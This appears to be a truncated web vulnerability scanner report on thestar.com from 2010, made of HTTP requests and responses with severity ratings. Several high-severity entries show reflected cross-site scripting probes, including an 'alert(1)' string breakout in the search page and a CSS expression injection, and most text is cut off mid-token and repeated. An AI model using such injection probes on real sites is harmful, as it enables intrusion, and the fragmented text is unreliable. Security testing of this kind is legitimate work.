GET /searchresults?AssetType Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.thestar.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-4 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:27:08 GMT X-Varnish: 2024525555 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 60114 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... an identifying name, server, and channel on the next lines. */ s.pageName="/Search s.hier2="Search s.prop1 = ">>f3ea1";alert(1)/ s.prop23 = "" //--> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | /searchresults |
GET /searchresults?AssetType Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.thestar.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-4 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:27:02 GMT X-Varnish: 2024525075 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 60686 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <meta name="Title" content=">>6df3f"style="x:expression ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /xd_receiver.htm |
GET /de162'%3b7bb6cd5b362 HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.facebook.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-1 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:21:52 GMT X-Varnish: 2024500642 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 52052 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | //mostpopular |
GET //mostpopular?category= Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.thestar.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-4 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:27:43 GMT X-Varnish: 2024528311 2024528226 Age: 1 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 1 Content-Length: 9051 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="Head1"><title> M ...[SNIP]... </title> <link type="text/css" rel="stylesheet" href="http://static <link type="text/css" rel="stylesheet" href="http://static <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | /Toplets/Polling/caching |
GET /Toplets/Polling/caching x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://www.thestar.com/ Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-3 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:18:38 GMT X-Varnish: 2024485652 2024478857 Age: 85 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 76 Content-Length: 3771 <div class="ts-module_header <span class="ts-shadow </div> <div class="ts-mo ...[SNIP]... </div> <a href="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | /includes/headerweather |
GET /includes/headerweather x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://www.thestar.com/ Accept: text/html, */*; q=0.01 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Sat, 20 Nov 2010 05:16:46 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-3 cache-control: public, max-age = 120 X-TOPS-CacheReason: Weather Date: Sat, 20 Nov 2010 05:19:11 GMT X-Varnish: 2024487916 2024476725 Age: 144 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 275 Content-Length: 545 <a class="ts-weather_icon" href="/theweather/Canada <img src="http://static </a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | /mostpopular |
GET /mostpopular?category= Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.thestar.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-3 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:18:30 GMT X-Varnish: 2024485016 2024465344 Age: 252 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 296 Content-Length: 8443 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="Head1"><title> M ...[SNIP]... </title> <link type="text/css" rel="stylesheet" href="http://static <link type="text/css" rel="stylesheet" href="http://static <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | /searchresults |
GET /searchresults?AssetType Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.thestar.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-4 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:20:24 GMT X-Varnish: 2024493633 2024488280 Age: 63 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 1 Content-Length: 80767 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </script> <link rel="shortcut icon" href="http://static <!-- RSS Autodiscovery --> ...[SNIP]... <meta name="viewport" content="width=device <link type="text/css" rel="stylesheet" href="http://static <!--[if lt IE 7]> ...[SNIP]... <![endif]--> <link type="text/css" rel="stylesheet" href="http://static <script language="javascript" type="text/javascript" src="http://ajax <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static ...[SNIP]... <meta name="Description" content="Find articles and multimedia about '''' from thestar.com" /> <script language="javascript" type="text/javascript" src="http://static <link type="text/css" rel="stylesheet" href="http://static <script type="text/javascript"> ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.wheels ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.yourhome ...[SNIP]... <li><a href="http://www.toronto ...[SNIP]... <a href="/" class="thestarlogo"><img src="http://static ...[SNIP]... <li><a href="http://pqasb ...[SNIP]... <li class=" "> <a href="http://thestar <span> ...[SNIP]... <li class="ts-first"> <a href="http://vehicles ...[SNIP]... <li > <a href="http://thestar ...[SNIP]... <li > <a href="http://www.legacy ...[SNIP]... <li class="ts-last"> <a href="http://www ...[SNIP]... <li><a href="http://affiliate ...[SNIP]... <li><a href="http://www.goldbook ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.toronto ...[SNIP]... <li><a href="http://www.yourhome ...[SNIP]... <li><a href="http://www.wheels ...[SNIP]... <li><a href="http://newinhomes ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <div class="ts-right">Search our <a href="http://pqasb ...[SNIP]... <noscript><a href="http://www.omniture src="http://n.thestar.com ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... </script> <script language="JavaScript" src="http://www.google ...[SNIP]... <div class="ts-slideleft"> <img src="http://static </div> ...[SNIP]... <div class="ts-smgfooter_logo" <a href="http://www <img src="http://static </a> ...[SNIP]... t-begin-at-67" onclick="javascript: pageTracker._trackPa <img src="http://media.thestar </a> ...[SNIP]... <div class="ts-slideright"> <img src="http://static </div> ...[SNIP]... <div class="ts-slideleft"> <img src="http://static </div> ...[SNIP]... <div class="ts-smgfooter_logo" <a href="http://www.wheels <img src="http://static </a> ...[SNIP]... <!-- 1 wheels page URL here --> <a href="http://www.wheels <!-- 2 image url 133x100 size --> <img src="http://media.wheels ...[SNIP]... <!-- 3 repeat wheels page URL --> <a href="http://www.wheels <!-- 4 text goes here --> ...[SNIP]... <div class="ts-slideright"> <img src="http://static </div> ...[SNIP]... <div class="ts-slideleft"> <img src="http://static </div> ...[SNIP]... <div class="ts-smgfooter_logo" <a href="http://www <img src="http://static </a> ...[SNIP]... ly-resorts" onclick="javascript: pageTracker._trackPa <img src="http://media.thestar </a> ...[SNIP]... <div class="ts-slideright"> <img src="http://static </div> ...[SNIP]... <div class="ts-slideleft"> <img src="http://static </div> ...[SNIP]... <div class="ts-smgfooter_logo" <a href="http://www.yourhome <img src="http://static </a> ...[SNIP]... ts-to-clean-now" onclick="javascript: pageTracker._trackPa <img src="http://media.thestar </a> ...[SNIP]... <div class="ts-slideright"> <img src="http://static </div> ...[SNIP]... <div class="ts-slideleft"> <img src="http://static </div> ...[SNIP]... <div class="ts-smgfooter_logo" <a href="http://www <img src="http://static </a> ...[SNIP]... -organs-again" onclick="javascript: pageTracker._trackPa <img src="http://media.thestar " /> </a> ...[SNIP]... <div class="ts-slideright"> <img src="http://static </div> ...[SNIP]... <div class="ts-slideleft"> <img src="http://static </div> ...[SNIP]... <div class="ts-smgfooter_logo" <a href="http://www.toronto <img src="http://static </a> ...[SNIP]... <div class="ts-footer <a href="http://www.toronto <img src="http://media.thestar </div> <div class="ts-tdc_slide_desc" <a href="http://www.toronto Festive Guide: Holiday events, gifts, party planning</a> ...[SNIP]... <div class="ts-slideright"> <img src="http://static </div> ...[SNIP]... <li><a href="http://jobs ...[SNIP]... <li><a href="http://mediakit ...[SNIP]... <li><a href="http://www ...[SNIP]... <td><a href="http://www.wheels ...[SNIP]... <td><a href="http://www.toronto ...[SNIP]... <td><a href="http://pagesof ...[SNIP]... <td><a href="http://travelalerts " target="_blank"> ...[SNIP]... <td><a href="http://www ...[SNIP]... <td><a href="http://www ...[SNIP]... <td><a href="http://leasebusters ...[SNIP]... <td><a href="http://save.ca/" target="_blank">Save.ca</a> ...[SNIP]... <td><a href="http://shoptvcanada ...[SNIP]... <td><a href="http://www ...[SNIP]... </div> <script type="text/javascript" src="http://static.ak ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | /searchresults |
GET /searchresults?AssetType Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.thestar.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-5 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:22:12 GMT X-Varnish: 2024502285 2024490597 Age: 144 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 1 Content-Length: 59327 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </script> <link rel="shortcut icon" href="http://static <!-- RSS Autodiscovery --> ...[SNIP]... <meta name="viewport" content="width=device <link type="text/css" rel="stylesheet" href="http://static <!--[if lt IE 7]> ...[SNIP]... <![endif]--> <link type="text/css" rel="stylesheet" href="http://static <script language="javascript" type="text/javascript" src="http://ajax <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static ...[SNIP]... <meta name="Description" content="Find articles and multimedia about >> from thestar.com" /> <script language="javascript" type="text/javascript" src="http://static <link type="text/css" rel="stylesheet" href="http://static <script type="text/javascript"> ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.wheels ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.yourhome ...[SNIP]... <li><a href="http://www.toronto ...[SNIP]... <a href="/" class="thestarlogo"><img src="http://static ...[SNIP]... <li><a href="http://pqasb ...[SNIP]... <li class=" "> <a href="http://thestar <span> ...[SNIP]... <li class="ts-first"> <a href="http://vehicles ...[SNIP]... <li > <a href="http://thestar ...[SNIP]... <li > <a href="http://www.legacy ...[SNIP]... <li class="ts-last"> <a href="http://www ...[SNIP]... <li><a href="http://affiliate ...[SNIP]... <li><a href="http://www.goldbook ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.toronto ...[SNIP]... <li><a href="http://www.yourhome ...[SNIP]... <li><a href="http://www.wheels ...[SNIP]... <li><a href="http://newinhomes ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <div class="ts-right">Search our <a href="http://pqasb ...[SNIP]... <noscript><a href="http://www.omniture src="http://n.thestar.com ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... </script> <script language="JavaScript" src="http://www.google ...[SNIP]... <div class="ts-slideleft"> <img src="http://static </div> ...[SNIP]... <div class="ts-smgfooter_logo" <a href="http://www <img src="http://static </a> ...[SNIP]... t-begin-at-67" onclick="javascript: pageTracker._trackPa <img src="http://media.thestar </a> ...[SNIP]... <div class="ts-slideright"> <img src="http://static </div> ...[SNIP]... <div class="ts-slideleft"> <img src="http://static </div> ...[SNIP]... <div class="ts-smgfooter_logo" <a href="http://www.wheels <img src="http://static </a> ...[SNIP]... <!-- 1 wheels page URL here --> <a href="http://www.wheels <!-- 2 image url 133x100 size --> <img src="http://media.wheels ...[SNIP]... <!-- 3 repeat wheels page URL --> <a href="http://www.wheels <!-- 4 text goes here --> ...[SNIP]... <div class="ts-slideright"> <img src="http://static </div> ...[SNIP]... <div class="ts-slideleft"> <img src="http://static </div> ...[SNIP]... <div class="ts-smgfooter_logo" <a href="http://www <img src="http://static </a> ...[SNIP]... ly-resorts" onclick="javascript: pageTracker._trackPa <img src="http://media.thestar </a> ...[SNIP]... <div class="ts-slideright"> <img src="http://static </div> ...[SNIP]... <div class="ts-slideleft"> <img src="http://static </div> ...[SNIP]... <div class="ts-smgfooter_logo" <a href="http://www.yourhome <img src="http://static </a> ...[SNIP]... ts-to-clean-now" onclick="javascript: pageTracker._trackPa <img src="http://media.thestar </a> ...[SNIP]... <div class="ts-slideright"> <img src="http://static </div> ...[SNIP]... <div class="ts-slideleft"> <img src="http://static </div> ...[SNIP]... <div class="ts-smgfooter_logo" <a href="http://www <img src="http://static </a> ...[SNIP]... -organs-again" onclick="javascript: pageTracker._trackPa <img src="http://media.thestar " /> </a> ...[SNIP]... <div class="ts-slideright"> <img src="http://static </div> ...[SNIP]... <div class="ts-slideleft"> <img src="http://static </div> ...[SNIP]... <div class="ts-smgfooter_logo" <a href="http://www.toronto <img src="http://static </a> ...[SNIP]... <div class="ts-footer <a href="http://www.toronto <img src="http://media.thestar </div> <div class="ts-tdc_slide_desc" <a href="http://www.toronto Festive Guide: Holiday events, gifts, party planning</a> ...[SNIP]... <div class="ts-slideright"> <img src="http://static </div> ...[SNIP]... <li><a href="http://jobs ...[SNIP]... <li><a href="http://mediakit ...[SNIP]... <li><a href="http://www ...[SNIP]... <td><a href="http://www.wheels ...[SNIP]... <td><a href="http://www.toronto ...[SNIP]... <td><a href="http://pagesof ...[SNIP]... <td><a href="http://travelalerts " target="_blank"> ...[SNIP]... <td><a href="http://www ...[SNIP]... <td><a href="http://www ...[SNIP]... <td><a href="http://leasebusters ...[SNIP]... <td><a href="http://save.ca/" target="_blank">Save.ca</a> ...[SNIP]... <td><a href="http://shoptvcanada ...[SNIP]... <td><a href="http://www ...[SNIP]... </div> <script type="text/javascript" src="http://static.ak ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | / |
GET / HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.google.com/url Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.thestar.com Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Sat, 20 Nov 2010 05:18:13 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-2 cache-control: public, max-age=300 X-TOPS-CacheReason: TheStarHomePage Date: Sat, 20 Nov 2010 05:18:18 GMT X-Varnish: 848707087 848706977 Age: 1 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish3 X-Cache: HIT X-Cache-Hits: 1 Set-Cookie: BIGipServerTOPS-WebFarm5 Content-Length: 206141 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link type="text/css" rel="stylesheet" href="http://static <script language="javascript" type="text/javascript" src="http://ajax <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static ...[SNIP]... <link type="text/css" rel="stylesheet" href="/TopletsResources <script language="javascript" type="text/javascript" src="http://www.google <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static ...[SNIP]... </script> <script type="text/javascript"src ...[SNIP]... </div> <script type="text/javascript" src="http://static.ak ...[SNIP]... </script> <script type="text/javascript" src="http://eyereact ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | //mostpopular |
GET //mostpopular?category= Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.thestar.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-4 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:27:43 GMT X-Varnish: 2024528311 2024528226 Age: 1 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 1 Content-Length: 9051 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="Head1"><title> M ...[SNIP]... <link type="text/css" rel="stylesheet" href="http://static <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | /mostpopular |
GET /mostpopular?category= Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.thestar.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-3 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:18:30 GMT X-Varnish: 2024485016 2024465344 Age: 252 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 296 Content-Length: 8443 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="Head1"><title> M ...[SNIP]... <link type="text/css" rel="stylesheet" href="http://static <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | /searchresults |
GET /searchresults?AssetType Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.thestar.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-4 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:20:24 GMT X-Varnish: 2024493633 2024488280 Age: 63 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 1 Content-Length: 80767 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link type="text/css" rel="stylesheet" href="http://static <script language="javascript" type="text/javascript" src="http://ajax <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static <script language="javascript" type="text/javascript" src="http://static ...[SNIP]... <meta name="Description" content="Find articles and multimedia about '''' from thestar.com" /> <script language="javascript" type="text/javascript" src="http://static ...[SNIP]... </script> <script language="JavaScript" src="http://www.google ...[SNIP]... </div> <script type="text/javascript" src="http://static.ak ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | /xd_receiver.htm |
GET /xd_receiver.htm HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.facebook.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Wed, 29 Jul 2009 19:35:26 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-1 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:19:34 GMT X-Varnish: 2024489808 2024478896 Age: 137 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 132 Content-Length: 371 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>cross domain receiver pa ...[SNIP]... <body> <script src="http://static.ak ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | / |
GET / HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.google.com/url Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.thestar.com Proxy-Connection: Keep-Alive |
